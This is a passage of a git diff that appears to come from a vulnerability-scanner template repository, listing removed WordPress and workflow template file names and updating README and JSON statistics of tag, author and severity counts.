-vulnerabilities/wordpress/wp-nextgen-xss.yaml -vulnerabilities/wordpress/wp-oxygen-theme-lfi.yaml -vulnerabilities/wordpress/wp-phpfreechat-xss.yaml -vulnerabilities/wordpress/wp-plugin-1-flashgallery-listing.yaml -vulnerabilities/wordpress/wp-plugin-lifterlms.yaml -vulnerabilities/wordpress/wp-plugin-utlimate-member.yaml -vulnerabilities/wordpress/wp-popup-listing.yaml -vulnerabilities/wordpress/wp-prostore-open-redirect.yaml -vulnerabilities/wordpress/wp-qards-listing.yaml -vulnerabilities/wordpress/wp-revslider-file-download.yaml -vulnerabilities/wordpress/wp-securimage-xss.yaml -vulnerabilities/wordpress/wp-sfwd-lms-listing.yaml -vulnerabilities/wordpress/wp-simple-fields-lfi.yaml -vulnerabilities/wordpress/wp-slideshow-xss.yaml -vulnerabilities/wordpress/wp-socialfit-xss.yaml -vulnerabilities/wordpress/wp-spot-premium-lfi.yaml -vulnerabilities/wordpress/wp-super-forms.yaml -vulnerabilities/wordpress/wp-tinymce-lfi.yaml -vulnerabilities/wordpress/wp-tutor-lfi.yaml -vulnerabilities/wordpress/wp-upload-data.yaml -vulnerabilities/wordpress/wp-vault-lfi.yaml -vulnerabilities/wordpress/wp-whmcs-xss.yaml -vulnerabilities/wordpress/wp-woocommerce-email-verification.yaml -vulnerabilities/wordpress/wp-woocommerce-file-download.yaml -vulnerabilities/wordpress/wp-woocommerce-pdf-invoice-listing.yaml -vulnerabilities/wordpress/wp-xmlrpc-brute-force.yaml -vulnerabilities/wordpress/wp-xmlrpc-pingback-detection.yaml -vulnerabilities/wordpress/wpdm-cache-session.yaml -vulnerabilities/wordpress/wpmudev-pub-keys.yaml -vulnerabilities/wordpress/wptouch-open-redirect.yaml -workflows/74cms-workflow.yaml -workflows/acrolinx-workflow.yaml -workflows/activemq-workflow.yaml -workflows/adminer-workflow.yaml -workflows/aem-workflow.yaml -workflows/airflow-workflow.yaml -workflows/ambari-workflow.yaml -workflows/apache-workflow.yaml -workflows/apereo-cas-workflow.yaml -workflows/apisix-workflow.yaml -workflows/artica-web-proxy-workflow.yaml -workflows/artifactory-workflow.yaml -workflows/avantfax-workflow.yaml -workflows/aviatrix-workflow.yaml -workflows/axigen-workflow.yaml -workflows/azkaban-workflow.yaml -workflows/b2evolution-workflow.yaml -workflows/bigip-workflow.yaml -workflows/bitrix-workflow.yaml -workflows/bomgar-workflow.yaml -workflows/bullwark-workflow.yaml -workflows/cacti-workflow.yaml -workflows/centos-workflow.yaml -workflows/chamilo-workflow.yaml -workflows/checkpoint-workflow.yaml -workflows/cherokee-workflow.yaml -workflows/circarlife-workflow.yaml -workflows/cisco-asa-workflow.yaml -workflows/cisco-meraki-workflow.yaml -workflows/cockpit-workflow.yaml -workflows/cocoon-workflow.yaml -workflows/coldfusion-workflow.yaml -workflows/concrete-workflow.yaml -workflows/confluence-workflow.yaml -workflows/dahua-workflow.yaml -workflows/dedecms-workflow.yaml -workflows/default-application-workflow.yaml -workflows/dell-idrac-workflow.yaml -workflows/dolibarr-workflow.yaml -workflows/dotnetnuke-workflow.yaml -workflows/drupal-workflow.yaml -workflows/duomicms-workflow.yaml -workflows/dynamicweb-workflow.yaml -workflows/emby-workflow.yaml -workflows/episerver-workflow.yaml -workflows/feifeicms-workflow.yaml -workflows/finereport-workflow.yaml -workflows/fortinet-workflow.yaml -workflows/gateone-workflow.yaml -workflows/geowebserver-workflow.yaml -workflows/gespage-workflow.yaml -workflows/gitlab-workflow.yaml -workflows/gitlist-workflow.yaml -workflows/glpi-workflow.yaml -workflows/gocd-workflow.yaml -workflows/gogs-workflow.yaml -workflows/gophish-workflow.yaml -workflows/graphite-workflow.yaml -workflows/grav-workflow.yaml -workflows/gsoap-workflow.yaml -workflows/guacamole-workflow.yaml -workflows/h3c-imc-workflow.yaml -workflows/harbor-workflow.yaml -workflows/hikvision-workflow.yaml -workflows/igs-workflow.yaml -workflows/itop-workflow.yaml -workflows/jboss-workflow.yaml -workflows/jeedom-workflow.yaml -workflows/jellyfin-workflow.yaml -workflows/jenkins-workflow.yaml -workflows/jetty-workflow.yaml -workflows/jira-workflow.yaml -workflows/joomla-workflow.yaml -workflows/kentico-workflow.yaml -workflows/keycloak-workflow.yaml -workflows/kibana-workflow.yaml -workflows/kindeditor-workflow.yaml -workflows/kong-workflow.yaml -workflows/lanproxy-workflow.yaml -workflows/lansweeper-workflow.yaml -workflows/laravel-workflow.yaml -workflows/liferay-workflow.yaml -workflows/lotus-domino-workflow.yaml -workflows/lucee-workflow.yaml -workflows/magento-workflow.yaml -workflows/magmi-workflow.yaml -workflows/maian-workflow.yaml -workflows/mantisbt-workflow.yaml -workflows/mautic-workflow.yaml -workflows/metabase-workflow.yaml -workflows/metinfo-workflow.yaml -workflows/micro-focus-workflow.yaml -workflows/microsoft-exchange-workflow.yaml -workflows/microstrategy-workflow.yaml -workflows/mida-eframework-workflow.yaml -workflows/mobileiron-workflow.yaml -workflows/moodle-workflow.yaml -workflows/movable-workflow.yaml -workflows/netgear-workflow.yaml -workflows/netsweeper-workflow.yaml -workflows/nette-workflow.yaml -workflows/node-red-workflow.yaml -workflows/novnc-workflow.yaml -workflows/ofbiz-workflow.yaml -workflows/openam-workflow.yaml -workflows/openemr-workflow.yaml -workflows/opensis-workflow.yaml -workflows/opensns-workflow.yaml -workflows/oscommerce-workflow.yaml -workflows/pandora-workflow.yaml -workflows/pega-workflow.yaml -workflows/pentaho-workflow.yaml -workflows/phpcollab-workflow.yaml -workflows/phpmyadmin-workflow.yaml -workflows/phppgadmin-workflow.yaml -workflows/phpwiki-workflow.yaml -workflows/powercreator-workflow.yaml -workflows/processmaker-workflow.yaml -workflows/prometheus-workflow.yaml -workflows/prtg-workflow.yaml -workflows/pulsesecure-workflow.yaml -workflows/qcubed-workflow.yaml -workflows/r-seenet-workflow.yaml -workflows/rancher-workflow.yaml -workflows/rconfig-workflow.yaml -workflows/ricoh-workflow.yaml -workflows/rosariosis-workflow.yaml -workflows/rstudio-workflow.yaml -workflows/ruijie-workflow.yaml -workflows/saltstack-workflow.yaml -workflows/samsung-wlan-ap-workflow.yaml -workflows/sarg-workflow.yaml -workflows/sco-workflow.yaml -workflows/sequoiadb-workflow.yaml -workflows/sharepoint-workflow.yaml -workflows/shopxo-workflow.yaml -workflows/sidekiq-workflow.yaml -workflows/sitecore-workflow.yaml -workflows/skywalking-workflow.yaml -workflows/solarwinds-orion-workflow.yaml -workflows/solr-workflow.yaml -workflows/sonarqube-workflow.yaml -workflows/sourcebans-workflow.yaml -workflows/splunk-workflow.yaml -workflows/springboot-workflow.yaml -workflows/squirrelmail-workflow.yaml -workflows/subrion-workflow.yaml -workflows/sugarcrm-workflow.yaml -workflows/symfony-workflow.yaml -workflows/sysaid-workflow.yaml -workflows/tapestry-workflow.yaml -workflows/terramaster-workflow.yaml -workflows/thinfinity-workflow.yaml -workflows/thinkadmin-workflow.yaml -workflows/thinkcmf-workflow.yaml -workflows/thinkphp-workflow.yaml -workflows/thruk-workflow.yaml -workflows/tikiwiki-workflow.yaml -workflows/tomcat-workflow.yaml -workflows/tongda-workflow.yaml -workflows/tpshop-workflow.yaml -workflows/traefik-workflow.yaml -workflows/umbraco-workflow.yaml -workflows/vmware-workflow.yaml -workflows/voipmonitor-workflow.yaml -workflows/weblogic-workflow.yaml -workflows/webmin-workflow.yaml -workflows/websvn-workflow.yaml -workflows/worksite-takeover-workflow.yaml -workflows/wuzhicms-workflow.yaml -workflows/xdcms-workflow.yaml -workflows/xiuno-workflow.yaml -workflows/xxljob-workflow.yaml -workflows/yapi-workflow.yaml -workflows/yii-workflow.yaml -workflows/zabbix-workflow.yaml -workflows/zcms-workflow.yaml -workflows/zeroshell-workflow.yaml -workflows/zimbra-workflow.yaml -workflows/zzzcms-workflow.yaml diff --git a/README.md b/README.md index c40d38d6e4..b2ae733d39 100644 --- a/README.md +++ b/README.md @@ -42,18 +42,18 @@ An overview of the nuclei template project, including statistics on unique tags, | TAG | COUNT | AUTHOR | COUNT | DIRECTORY | COUNT | SEVERITY | COUNT | TYPE | COUNT | |-----------|-------|---------------|-------|------------------|-------|----------|-------|---------|-------| -| cve | 1046 | daffainfo | 544 | cves | 1051 | info | 1064 | http | 2880 | -| panel | 441 | dhiyaneshdk | 406 | exposed-panels | 441 | high | 776 | file | 57 | -| lfi | 426 | pikpikcu | 313 | vulnerabilities | 417 | medium | 616 | network | 49 | -| xss | 333 | pdteam | 255 | technologies | 225 | critical | 384 | dns | 16 | -| wordpress | 328 | geeknik | 174 | exposures | 199 | low | 171 | | | -| exposure | 275 | dwisiswant0 | 162 | misconfiguration | 188 | | | | | -| rce | 267 | 0x_akoko | 111 | workflows | 185 | | | | | -| cve2021 | 250 | gy741 | 108 | token-spray | 147 | | | | | -| tech | 236 | princechaddha | 106 | default-logins | 74 | | | | | +| cve | 1056 | daffainfo | 544 | cves | 1061 | info | 1067 | http | 2905 | +| panel | 446 | dhiyaneshdk | 406 | exposed-panels | 447 | high | 789 | file | 57 | +| lfi | 430 | pikpikcu | 313 | vulnerabilities | 421 | medium | 622 | network | 49 | +| xss | 335 | pdteam | 257 | technologies | 227 | critical | 384 | dns | 17 | +| wordpress | 329 | geeknik | 174 | exposures | 199 | low | 169 | | | +| exposure | 282 | dwisiswant0 | 163 | misconfiguration | 188 | unknown | 6 | | | +| rce | 268 | 0x_akoko | 114 | workflows | 185 | | | | | +| cve2021 | 251 | gy741 | 109 | token-spray | 147 | | | | | +| tech | 238 | princechaddha | 109 | default-logins | 77 | | | | | | wp-plugin | 235 | pussycat0x | 104 | takeovers | 67 | | | | | -**222 directories, 3221 files**. +**225 directories, 3247 files**. diff --git a/TEMPLATES-STATS.json b/TEMPLATES-STATS.json index 6ea3a64f36..d115a540ea 100644 --- a/TEMPLATES-STATS.json +++ b/TEMPLATES-STATS.json @@ -1 +1 @@ -{"tags":[{"name":"cve","count":1046},{"name":"panel","count":441},{"name":"lfi","count":426},{"name":"xss","count":333},{"name":"wordpress","count":328},{"name":"exposure","count":275},{"name":"rce","count":267},{"name":"cve2021","count":250},{"name":"tech","count":236},{"name":"wp-plugin","count":235},{"name":"cve2020","count":188},{"name":"","count":186},{"name":"token-spray","count":147},{"name":"joomla","count":130},{"name":"config","count":116},{"name":"apache","count":115},{"name":"cve2019","count":114},{"name":"cve2018","count":112},{"name":"cve2010","count":110},{"name":"iot","count":96},{"name":"oast","count":91},{"name":"default-login","count":84},{"name":"login","count":83},{"name":"unauth","count":81},{"name":"takeover","count":73},{"name":"token","count":69},{"name":"redirect","count":63},{"name":"misconfig","count":61},{"name":"cve2017","count":59},{"name":"file","count":57},{"name":"ssrf","count":55},{"name":"sqli","count":53},{"name":"network","count":52},{"name":"oracle","count":45},{"name":"cve2016","count":44},{"name":"disclosure","count":41},{"name":"router","count":41},{"name":"plugin","count":39},{"name":"cve2014","count":37},{"name":"google","count":36},{"name":"cisco","count":35},{"name":"cve2015","count":34},{"name":"auth-bypass","count":34},{"name":"logs","count":34},{"name":"atlassian","count":31},{"name":"wp","count":31},{"name":"jira","count":30},{"name":"listing","count":30},{"name":"injection","count":28},{"name":"authenticated","count":28},{"name":"traversal","count":28},{"name":"generic","count":25},{"name":"proxy","count":22},{"name":"sap","count":21},{"name":"fuzz","count":21},{"name":"aem","count":20},{"name":"misc","count":20},{"name":"service","count":20},{"name":"cve2022","count":20},{"name":"debug","count":20},{"name":"springboot","count":19},{"name":"cve2012","count":19},{"name":"php","count":18},{"name":"cms","count":18},{"name":"vmware","count":18},{"name":"wp-theme","count":18},{"name":"intrusive","count":18},{"name":"microsoft","count":18},{"name":"adobe","count":18},{"name":"dns","count":17},{"name":"deserialization","count":17},{"name":"weblogic","count":17},{"name":"aws","count":16},{"name":"cnvd","count":16},{"name":"ibm","count":16},{"name":"manageengine","count":16},{"name":"jenkins","count":15},{"name":"devops","count":15},{"name":"cve2011","count":15},{"name":"xxe","count":14},{"name":"android","count":14},{"name":"zoho","count":14},{"name":"cve2009","count":14},{"name":"gitlab","count":14},{"name":"struts","count":14},{"name":"dlink","count":14},{"name":"hp","count":13},{"name":"api","count":13},{"name":"java","count":12},{"name":"tomcat","count":12},{"name":"printer","count":12},{"name":"camera","count":12},{"name":"kubernetes","count":12},{"name":"status","count":12},{"name":"netsweeper","count":12},{"name":"cve2013","count":12},{"name":"magento","count":11},{"name":"ruijie","count":10},{"name":"glpi","count":10},{"name":"rails","count":10},{"name":"dell","count":10},{"name":"fileupload","count":10},{"name":"grafana","count":10},{"name":"netgear","count":10},{"name":"nginx","count":10},{"name":"backup","count":10},{"name":"ftp","count":9},{"name":"windows","count":9},{"name":"coldfusion","count":9},{"name":"upload","count":9},{"name":"airflow","count":9},{"name":"cve2008","count":9},{"name":"auth","count":9},{"name":"webserver","count":9},{"name":"drupal","count":9},{"name":"fastjson","count":9},{"name":"fortinet","count":9},{"name":"log4j","count":9},{"name":"metadata","count":8},{"name":"phpmyadmin","count":8},{"name":"confluence","count":8},{"name":"jndi","count":8},{"name":"scada","count":8},{"name":"prometheus","count":8},{"name":"citrix","count":8},{"name":"bypass","count":8},{"name":"vcenter","count":8},{"name":"zabbix","count":8},{"name":"spring","count":8},{"name":"django","count":8},{"name":"blind","count":8},{"name":"mirai","count":8},{"name":"solr","count":8},{"name":"woocommerce","count":8},{"name":"amazon","count":8},{"name":"kafka","count":7},{"name":"sonicwall","count":7},{"name":"maps","count":7},{"name":"elasticsearch","count":7},{"name":"exchange","count":7},{"name":"squirrelmail","count":7},{"name":"graphql","count":7},{"name":"laravel","count":7},{"name":"python","count":7},{"name":"bucket","count":7},{"name":"cnvd2021","count":7},{"name":"files","count":7},{"name":"mail","count":7},{"name":"rconfig","count":7},{"name":"azure","count":7},{"name":"jolokia","count":7},{"name":"nodejs","count":6},{"name":"sitecore","count":6},{"name":"jboss","count":6},{"name":"slack","count":6},{"name":"cobbler","count":6},{"name":"iis","count":6},{"name":"crlf","count":6},{"name":"zimbra","count":6},{"name":"github","count":6},{"name":"jetty","count":6},{"name":"ssti","count":6},{"name":"backdoor","count":6},{"name":"lucee","count":6},{"name":"magmi","count":6},{"name":"wso2","count":6},{"name":"enum","count":6},{"name":"headless","count":6},{"name":"vpn","count":6},{"name":"docker","count":6},{"name":"firmware","count":6},{"name":"ofbiz","count":6},{"name":"go","count":6},{"name":"druid","count":6},{"name":"alibaba","count":5},{"name":"cnvd2020","count":5},{"name":"git","count":5},{"name":"thinkphp","count":5},{"name":"symfony","count":5},{"name":"dedecms","count":5},{"name":"fatpipe","count":5},{"name":"icewarp","count":5},{"name":"gocd","count":5},{"name":"error","count":5},{"name":"firebase","count":5},{"name":"storage","count":5},{"name":"circarlife","count":5},{"name":"keycloak","count":5},{"name":"setup","count":5},{"name":"minio","count":5},{"name":"samsung","count":5},{"name":"ssl","count":5},{"name":"apisix","count":5},{"name":"symantec","count":5},{"name":"moodle","count":5},{"name":"zhiyuan","count":5},{"name":"rseenet","count":5},{"name":"rfi","count":5},{"name":"solarwinds","count":5},{"name":"strapi","count":5},{"name":"node","count":5},{"name":"couchdb","count":4},{"name":"xmlrpc","count":4},{"name":"gogs","count":4},{"name":"microweber","count":4},{"name":"bigip","count":4},{"name":"jetbrains","count":4},{"name":"hpe","count":4},{"name":"search","count":4},{"name":"stripe","count":4},{"name":"smtp","count":4},{"name":"opensis","count":4},{"name":"npm","count":4},{"name":"nexus","count":4},{"name":"lfr","count":4},{"name":"paypal","count":4},{"name":"awstats","count":4},{"name":"buffalo","count":4},{"name":"plesk","count":4},{"name":"leak","count":4},{"name":"flink","count":4},{"name":"fpd","count":4},{"name":"hikvision","count":4},{"name":"jellyfin","count":4},{"name":"oss","count":4},{"name":"elastic","count":4},{"name":"asp","count":4},{"name":"sonarqube","count":4},{"name":"cve2007","count":4},{"name":"artica","count":4},{"name":"ruby","count":4},{"name":"caucho","count":4},{"name":"photo","count":4},{"name":"mailchimp","count":4},{"name":"resin","count":4},{"name":"thinkcmf","count":4},{"name":"wcs","count":4},{"name":"artifactory","count":4},{"name":"cnvd2019","count":4},{"name":"websphere","count":4},{"name":"panos","count":4},{"name":"cacti","count":4},{"name":"aspose","count":4},{"name":"ssh","count":4},{"name":"activemq","count":4},{"name":"huawei","count":4},{"name":"ognl","count":4},{"name":"prestashop","count":4},{"name":"hongdian","count":4},{"name":"cache","count":4},{"name":"microstrategy","count":4},{"name":"cockpit","count":4},{"name":"kibana","count":4},{"name":"kevinlab","count":4},{"name":"mongodb","count":4},{"name":"exposures","count":3},{"name":"telerik","count":3},{"name":"bitrix","count":3},{"name":"db","count":3},{"name":"concrete","count":3},{"name":"synology","count":3},{"name":"k8s","count":3},{"name":"movable","count":3},{"name":"consul","count":3},{"name":"linkerd","count":3},{"name":"wordfence","count":3},{"name":"actuator","count":3},{"name":"lansweeper","count":3},{"name":"odoo","count":3},{"name":"dolibarr","count":3},{"name":"horizon","count":3},{"name":"geowebserver","count":3},{"name":"openam","count":3},{"name":"fanruan","count":3},{"name":"oa","count":3},{"name":"facebook","count":3},{"name":"selea","count":3},{"name":"pentaho","count":3},{"name":"graph","count":3},{"name":"phppgadmin","count":3},{"name":"nuuo","count":3},{"name":"ampps","count":3},{"name":"centos","count":3},{"name":"vbulletin","count":3},{"name":"globalprotect","count":3},{"name":"lotus","count":3},{"name":"zyxel","count":3},{"name":"log","count":3},{"name":"seeyon","count":3},{"name":"axis","count":3},{"name":"messaging","count":3},{"name":"voip","count":3},{"name":"hashicorp","count":3},{"name":"mongo","count":3},{"name":"axis2","count":3},{"name":"samba","count":3},{"name":"cves","count":3},{"name":"tikiwiki","count":3},{"name":"netlify","count":3},{"name":"adminer","count":3},{"name":"subrion","count":3},{"name":"hoteldruid","count":3},{"name":"postmessage","count":3},{"name":"trixbox","count":3},{"name":"voipmonitor","count":3},{"name":"empirecms","count":3},{"name":"ebs","count":3},{"name":"phpinfo","count":3},{"name":"square","count":3},{"name":"terramaster","count":3},{"name":"javascript","count":3},{"name":"nacos","count":3},{"name":"openssh","count":3},{"name":"sendgrid","count":3},{"name":"zeroshell","count":3},{"name":"webadmin","count":3},{"name":"httpd","count":3},{"name":"nosqli","count":3},{"name":"jeesns","count":3},{"name":"circleci","count":3},{"name":"grav","count":3},{"name":"trendnet","count":3},{"name":"bruteforce","count":3},{"name":"mcafee","count":3},{"name":"jamf","count":3},{"name":"linksys","count":3},{"name":"dos","count":3},{"name":"oauth","count":3},{"name":"heroku","count":3},{"name":"dreambox","count":3},{"name":"prtg","count":3},{"name":"axigen","count":3},{"name":"targa","count":3},{"name":"sql","count":3},{"name":"linkedin","count":3},{"name":"thinfinity","count":3},{"name":"ems","count":3},{"name":"epson","count":3},{"name":"cloud","count":3},{"name":"smb","count":3},{"name":"springcloud","count":3},{"name":"openbmcs","count":3},{"name":"fortios","count":3},{"name":"key","count":2},{"name":"pgadmin","count":2},{"name":"sequoiadb","count":2},{"name":"fortimail","count":2},{"name":"cas","count":2},{"name":"tidb","count":2},{"name":"ebook","count":2},{"name":"justwriting","count":2},{"name":"kentico","count":2},{"name":"openfire","count":2},{"name":"conductor","count":2},{"name":"bigbluebutton","count":2},{"name":"smartstore","count":2},{"name":"mida","count":2},{"name":"pacsone","count":2},{"name":"cgi","count":2},{"name":"vrealize","count":2},{"name":"spark","count":2},{"name":"igs","count":2},{"name":"showdoc","count":2},{"name":"qihang","count":2},{"name":"panabit","count":2},{"name":"ambari","count":2},{"name":"rabbitmq","count":2},{"name":"sentry","count":2},{"name":"sdwan","count":2},{"name":"hostheader-injection","count":2},{"name":"backups","count":2},{"name":"ucmdb","count":2},{"name":"zte","count":2},{"name":"umbraco","count":2},{"name":"cve2006","count":2},{"name":"aviatrix","count":2},{"name":"hiveos","count":2},{"name":"wooyun","count":2},{"name":"cloudinary","count":2},{"name":"harbor","count":2},{"name":"javamelody","count":2},{"name":"avantfax","count":2},{"name":"oos","count":2},{"name":"horde","count":2},{"name":"getsimple","count":2},{"name":"bomgar","count":2},{"name":"sharepoint","count":2},{"name":"apereo","count":2},{"name":"elfinder","count":2},{"name":"xxljob","count":2},{"name":"gophish","count":2},{"name":"hasura","count":2},{"name":"servicenow","count":2},{"name":"payara","count":2},{"name":"netis","count":2},{"name":"csrf","count":2},{"name":"hadoop","count":2},{"name":"natshell","count":2},{"name":"cve2005","count":2},{"name":"owasp","count":2},{"name":"splunk","count":2},{"name":"netflix","count":2},{"name":"pulse","count":2},{"name":"webcam","count":2},{"name":"idea","count":2},{"name":"aims","count":2},{"name":"sangfor","count":2},{"name":"sophos","count":2},{"name":"emerge","count":2},{"name":"matrix","count":2},{"name":"hjtcloud","count":2},{"name":"jfrog","count":2},{"name":"dynamicweb","count":2},{"name":"forcepoint","count":2},{"name":"maian","count":2},{"name":"graphite","count":2},{"name":"casdoor","count":2},{"name":"acrolinx","count":2},{"name":"wamp","count":2},{"name":"aruba","count":2},{"name":"labkey","count":2},{"name":"wuzhicms","count":2},{"name":"iptime","count":2},{"name":"favicon","count":2},{"name":"nextjs","count":2},{"name":"jquery","count":2},{"name":"ecoa","count":2},{"name":"flightpath","count":2},{"name":"thruk","count":2},{"name":"sugarcrm","count":2},{"name":"frontpage","count":2},{"name":"liferay","count":2},{"name":"gitea","count":2},{"name":"lighttpd","count":2},{"name":"gitlist","count":2},{"name":"tapestry","count":2},{"name":"ericsson","count":2},{"name":"sysaid","count":2},{"name":"traefik","count":2},{"name":"middleware","count":2},{"name":"rstudio","count":2},{"name":"craftcms","count":2},{"name":"flir","count":2},{"name":"otobo","count":2},{"name":"tableau","count":2},{"name":"seeddms","count":2},{"name":"jsf","count":2},{"name":"exacqvision","count":2},{"name":"bitly","count":2},{"name":"accela","count":2},{"name":"gitbook","count":2},{"name":"terraform","count":2},{"name":"pega","count":2},{"name":"guacamole","count":2},{"name":"saltstack","count":2},{"name":"rockmongo","count":2},{"name":"ecology","count":2},{"name":"redis","count":2},{"name":"jeedom","count":2},{"name":"neos","count":2},{"name":"linux","count":2},{"name":"hubspot","count":2},{"name":"jitsi","count":2},{"name":"netscaler","count":2},{"name":"metabase","count":2},{"name":"typo3","count":2},{"name":"detect","count":2},{"name":"netsus","count":2},{"name":"workspaceone","count":2},{"name":"glances","count":2},{"name":"watchguard","count":2},{"name":"idrac","count":2},{"name":"zblogphp","count":2},{"name":"metersphere","count":2},{"name":"couchbase","count":2},{"name":"erxes","count":2},{"name":"akkadian","count":2},{"name":"kafdrop","count":2},{"name":"yii","count":2},{"name":"digitalocean","count":2},{"name":"ghost","count":2},{"name":"circontrol","count":2},{"name":"itop","count":2},{"name":"rocketchat","count":2},{"name":"openstack","count":2},{"name":"airtame","count":2},{"name":"codeigniter","count":2},{"name":"glassfish","count":2},{"name":"openemr","count":2},{"name":"intercom","count":2},{"name":"alienvault","count":2},{"name":"ad","count":2},{"name":"waf","count":2},{"name":"auerswald","count":2},{"name":"webmin","count":2},{"name":"qcubed","count":2},{"name":"syslog","count":2},{"name":"yapi","count":2},{"name":"commax","count":2},{"name":"redash","count":2},{"name":"fortigate","count":2},{"name":"shellshock","count":2},{"name":"akamai","count":2},{"name":"frp","count":2},{"name":"gespage","count":2},{"name":"mailgun","count":2},{"name":"shenyu","count":2},{"name":"weather","count":2},{"name":"mysql","count":2},{"name":"xerox","count":2},{"name":"ec2","count":2},{"name":"chiyu","count":2},{"name":"virtualui","count":2},{"name":"rosariosis","count":2},{"name":"phpstorm","count":2},{"name":"sidekiq","count":2},{"name":"dotnetnuke","count":2},{"name":"tileserver","count":2},{"name":"versa","count":2},{"name":"chyrp","count":2},{"name":"projectsend","count":2},{"name":"places","count":2},{"name":"resourcespace","count":2},{"name":"zerof","count":2},{"name":"homematic","count":2},{"name":"plastic","count":2},{"name":"netdata","count":2},{"name":"motorola","count":2},{"name":"globaldomains","count":2},{"name":"listserv","count":2},{"name":"phpshowtime","count":2},{"name":"viewpoint","count":2},{"name":"jmx","count":2},{"name":"totemomail","count":2},{"name":"node-red-dashboard","count":2},{"name":"twitter","count":2},{"name":"rancher","count":2},{"name":"dvwa","count":2},{"name":"fortiweb","count":2},{"name":"proftpd","count":2},{"name":"embed","count":2},{"name":"ilo","count":2},{"name":"rackstation","count":2},{"name":"azkaban","count":2},{"name":"text","count":2},{"name":"skycaiji","count":2},{"name":"influxdb","count":2},{"name":"nextcloud","count":2},{"name":"chamilo","count":2},{"name":"s3","count":2},{"name":"mobileiron","count":2},{"name":"beyondtrust","count":2},{"name":"kong","count":2},{"name":"cocoon","count":2},{"name":"appcms","count":2},{"name":"phpcollab","count":2},{"name":"domxss","count":2},{"name":"nagios","count":2},{"name":"myfactory","count":2},{"name":"openvpn","count":2},{"name":"electron","count":2},{"name":"shopware","count":1},{"name":"springframework","count":1},{"name":"duomicms","count":1},{"name":"discourse","count":1},{"name":"accent","count":1},{"name":"uwsgi","count":1},{"name":"loytec","count":1},{"name":"interactsh","count":1},{"name":"apcu","count":1},{"name":"zcms","count":1},{"name":"sar2html","count":1},{"name":"razor","count":1},{"name":"clearbit","count":1},{"name":"overflow","count":1},{"name":"dahua","count":1},{"name":"gridx","count":1},{"name":"zipkin","count":1},{"name":"csod","count":1},{"name":"blue-ocean","count":1},{"name":"sureline","count":1},{"name":"lokalise","count":1},{"name":"mkdocs","count":1},{"name":"nps","count":1},{"name":"veeam","count":1},{"name":"jinfornet","count":1},{"name":"leanix","count":1},{"name":"zms","count":1},{"name":"gnuboard","count":1},{"name":"anchorcms","count":1},{"name":"helpdesk","count":1},{"name":"camunda","count":1},{"name":"varnish","count":1},{"name":"projector","count":1},{"name":"tenda","count":1},{"name":"pastebin","count":1},{"name":"sponip","count":1},{"name":"dotnet","count":1},{"name":"php-fusion","count":1},{"name":"clansphere","count":1},{"name":"zookeeper","count":1},{"name":"pinata","count":1},{"name":"xds","count":1},{"name":"apigee","count":1},{"name":"librenms","count":1},{"name":"nerdgraph","count":1},{"name":"tamronos","count":1},{"name":"contactform","count":1},{"name":"optimizely","count":1},{"name":"wifisky","count":1},{"name":"ncbi","count":1},{"name":"eyelock","count":1},{"name":"visualtools","count":1},{"name":"calendarix","count":1},{"name":"newrelic","count":1},{"name":"qvisdvr","count":1},{"name":"tplink","count":1},{"name":"nedi","count":1},{"name":"sourcebans","count":1},{"name":"shopizer","count":1},{"name":"feedwordpress","count":1},{"name":"tugboat","count":1},{"name":"deviantart","count":1},{"name":"panasonic","count":1},{"name":"apos","count":1},{"name":"dericam","count":1},{"name":"casemanager","count":1},{"name":"beanshell","count":1},{"name":"iframe","count":1},{"name":"babel","count":1},{"name":"b2evolution","count":1},{"name":"netmask","count":1},{"name":"openx","count":1},{"name":"graphiql","count":1},{"name":"redwood","count":1},{"name":"phpunit","count":1},{"name":"skywalking","count":1},{"name":"defectdojo","count":1},{"name":"opencast","count":1},{"name":"ebird","count":1},{"name":"workresources","count":1},{"name":"honeypot","count":1},{"name":"fcm","count":1},{"name":"cassandra","count":1},{"name":"minimouse","count":1},{"name":"directions","count":1},{"name":"rujjie","count":1},{"name":"netbeans","count":1},{"name":"spidercontrol","count":1},{"name":"emc","count":1},{"name":"eibiz","count":1},{"name":"musicstore","count":1},{"name":"zenphoto","count":1},{"name":"kronos","count":1},{"name":"jaspersoft","count":1},{"name":"route","count":1},{"name":"submitty","count":1},{"name":"jsp","count":1},{"name":"aura","count":1},{"name":"werkzeug","count":1},{"name":"vnc","count":1},{"name":"expn","count":1},{"name":"bedita","count":1},{"name":"nifi","count":1},{"name":"parentlink","count":1},{"name":"sonarcloud","count":1},{"name":"alchemy","count":1},{"name":"zmanda","count":1},{"name":"yaws","count":1},{"name":"spinnaker","count":1},{"name":"achecker","count":1},{"name":"clockwatch","count":1},{"name":"fms","count":1},{"name":"express","count":1},{"name":"testrail","count":1},{"name":"acexy","count":1},{"name":"clustering","count":1},{"name":"majordomo2","count":1},{"name":"seagate","count":1},{"name":"novnc","count":1},{"name":"livezilla","count":1},{"name":"blackboard","count":1},{"name":"h3c-imc","count":1},{"name":"admidio","count":1},{"name":"mapbox","count":1},{"name":"autocomplete","count":1},{"name":"zzzcms","count":1},{"name":"flexbe","count":1},{"name":"orbintelligence","count":1},{"name":"locations","count":1},{"name":"xampp","count":1},{"name":"revslider","count":1},{"name":"thinkadmin","count":1},{"name":"ipvpn","count":1},{"name":"particle","count":1},{"name":"acsoft","count":1},{"name":"pieregister","count":1},{"name":"mirasys","count":1},{"name":"securityspy","count":1},{"name":"securenvoy","count":1},{"name":"arl","count":1},{"name":"server","count":1},{"name":"cgit","count":1},{"name":"raspap","count":1},{"name":"ixcache","count":1},{"name":"jwt","count":1},{"name":"pan","count":1},{"name":"ecom","count":1},{"name":"unifi","count":1},{"name":"pmb","count":1},{"name":"lanproxy","count":1},{"name":"wmt","count":1},{"name":"travis","count":1},{"name":"bitcoinaverage","count":1},{"name":"mantisbt","count":1},{"name":"powercreator","count":1},{"name":"strava","count":1},{"name":"dreamweaver","count":1},{"name":"dompdf","count":1},{"name":"pagespeed","count":1},{"name":"geocode","count":1},{"name":"gcp","count":1},{"name":"bullwark","count":1},{"name":"netbiblio","count":1},{"name":"blockfrost","count":1},{"name":"roads","count":1},{"name":"rhymix","count":1},{"name":"redcap","count":1},{"name":"biqsdrive","count":1},{"name":"opensmtpd","count":1},{"name":"scs","count":1},{"name":"mpsec","count":1},{"name":"tjws","count":1},{"name":"phpfastcache","count":1},{"name":"bmc","count":1},{"name":"webeditors","count":1},{"name":"cve2002","count":1},{"name":"goip","count":1},{"name":"timesheet","count":1},{"name":"harvardart","count":1},{"name":"groupoffice","count":1},{"name":"restler","count":1},{"name":"default","count":1},{"name":"raspberrymatic","count":1},{"name":"opnsense","count":1},{"name":"domino","count":1},{"name":"webmod